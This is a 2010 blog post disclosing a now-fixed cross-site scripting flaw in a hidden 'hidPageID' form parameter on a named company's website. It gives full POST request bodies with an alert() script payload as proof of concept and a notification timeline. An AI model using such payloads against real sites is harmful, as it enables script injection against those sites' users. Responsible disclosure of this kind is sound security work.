Sunday, June 13, 2010

Cognizant vulnerable to Cross-Site Scripting (XSS)

+++About Cognizant+++
We help transform core processes for greater flexibility, higher efficiency and lower costs. 
http://www.cognizant.com/html/aboutus/about-us.asp

+++Affected URL(s)+++
http://cognizant.com/html/insights/insightslandingpage.asp

-> Case Studies
-> White Papers

+++Vulnerable Parameter / Function+++
'hidPageID''

+++PoC+++

POST Request
-> Case studies
hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=casestudy&hidYear=&hidPageTitle=Case+Studies&hidNavigatingFrom=Insights&hidPageNumber=1

-> White Papers
POST http://cognizant.com/html/insights/insightslandingpage.asp
global_office=%2Fhtml%2Fhome.asp&hidCommand=&hidSearchCriteria=&hidRequestedPageNumber=&hidPageID=<-script->alert("XSS from hidPageID")</script>&hidIncludeFileName=leftNav-insights.asp&hidContentType=bluepaper&hidYear=&hidPageTitle=White+Papers&hidNavigatingFrom=Insights&selFilterCriteria=All+white+papers&hidPageNumber=3


Cognizant Ist Notified: February 23, 2010
                IInd Notification: March 29, 2010
Response Received: March 30, 2010
Current Status: Fixed (As of today, June 13, 2010)

Thanks to Nikhilesh Jasuja @Cognizant for his quick response on resolving this issue.

Best Regards.

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.